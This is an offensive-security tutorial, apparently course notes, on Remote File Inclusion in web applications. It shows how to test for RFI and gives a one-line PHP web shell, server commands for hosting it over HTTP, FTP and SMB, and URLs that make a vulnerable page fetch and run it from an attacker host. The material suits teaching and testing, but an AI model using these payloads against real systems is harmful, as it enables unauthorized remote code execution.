# Remote File Inclusion (RFI)
in some cases, we may also be able to include remote files "[Remote File Inclusion (RFI)](https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion)", if the vulnerable function allows the inclusion of remote URLs. This allows two main benefits:

1. Enumerating local-only ports and web applications (i.e. SSRF)
2. Gaining remote code execution by including a malicious script that we host
## Local vs. Remote File Inclusion
When a vulnerable function allows us to include remote files, we may be able to host a malicious script, and then include it in the vulnerable page to execute malicious functions and gain remote code execution.
the following are some of the functions that (if vulnerable) would allow RFI:

|**Function**|**Read Content**|**Execute**|**Remote URL**|
|---|:-:|:-:|:-:|
|**PHP**||||
|`include()`/`include_once()`|✅|✅|✅|
|`file_get_contents()`|✅|❌|✅|
|**Java**||||
|`import`|✅|✅|✅|
|**.NET**||||
|`@Html.RemotePartial()`|✅|❌|✅|
|`include`|✅|✅|✅|

> Almost any RFI vulnerability is also an LFI vulnerability, however, an LFI may not necessarily be an RFI.
## Verify RFI
In most languages, including remote URLs is considered as a dangerous practice as it may allow for such vulnerabilities.

This is why remote URL inclusion is usually disabled by default. 

To determine whether an LFI vulnerability is also vulnerable to RFI is to `try and include a URL`, and see if we can get its content to ensure our attempt does not get blocked by a firewall or other security measures. 

So, let's use (`http://127.0.0.1:80/index.php`) as our input string and see if it gets included:
```url
http://<SERVER_IP>:<PORT>/index.php?language=http://127.0.0.1:80/index.php
```

If the `index.php` page got included in the vulnerable section, it is vulnerable to RFI.
- We also see that we were able to specify port `80` and get the web application on that port. If the back-end server hosted any other local web applications (e.g. port `8080`), then we may be able to access them through the RFI vulnerability by applying SSRF techniques on it.
## Remote Code Execution with RFI
The first step in gaining remote code execution is creating a malicious script in the language of the web application, PHP in this case. We can use a custom web shell we download from the internet, use a reverse shell script, or write our own basic web shell:
```bash
echo '<?php system($_GET["cmd"]); ?>' > shell.php
```

Now, all we need to do is host this script and include it through the RFI vulnerability.
- Furthermore, we may host the script through an FTP service or an SMB service, as we will see next.
### HTTP
Now, we can start a server on our machine with a basic python server with the following command, as follows:
```bash
sudo python3 -m http.server <LISTENING_PORT>
```

Now, we can include our local shell through RFI, like we did earlier, but using `<OUR_IP>` and our `<LISTENING_PORT>`. We will also specify the command to be executed with `&cmd=id`:
```
http://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id
```

We will then see the execution of the command on the web browser.
### FTP
We may also host our script through the FTP protocol. We can start a basic FTP server with Python's `pyftpdlib`, as follows:
```bash
sudo python -m pyftpdlib -p 21
```
- This may also be useful in case http ports are blocked by a firewall or the `http://` string gets blocked by a WAF.

We can repeat what we did earlier, but use the `ftp://` scheme in the URL, as follows:
```url
http://<SERVER_IP>:<PORT>/index.php?language=ftp://<OUR_IP>/shell.php&cmd=id
```

By default, PHP tries to authenticate as an anonymous user. If the server requires valid authentication, then the credentials can be specified in the URL, as follows:
```bash
curl 'http://<SERVER_IP>:<PORT>/index.php?language=ftp://user:pass@localhost/shell.php&cmd=id'
```
### SMB
If the vulnerable web application is hosted on a Windows server (which we can tell from the server version in the HTTP response headers), then we do not need the `allow_url_include` setting to be enabled for RFI exploitation, as we can utilize the SMB protocol for the remote file inclusion.
- Windows treats files on remote SMB servers as normal files, which can be referenced directly with a UNC path.

We can spin up an SMB server using `Impacket's smbserver.py`, which allows anonymous authentication by default, as follows:
```bash
impacket-smbserver -smb2support share $(pwd)
```

Now, we can include our script by using a UNC path (e.g. `\\<OUR_IP>\share\shell.php`), and specify the command with (`&cmd=whoami`) as we did earlier:
```url
http://<SERVER_IP>:<PORT>/index.php?language=\\<OUR_IP>\share\shell.php&cmd=whoami
```
> Note: Accessing remote SMB servers over the internet may be disabled by default, depending on the Windows server configurations.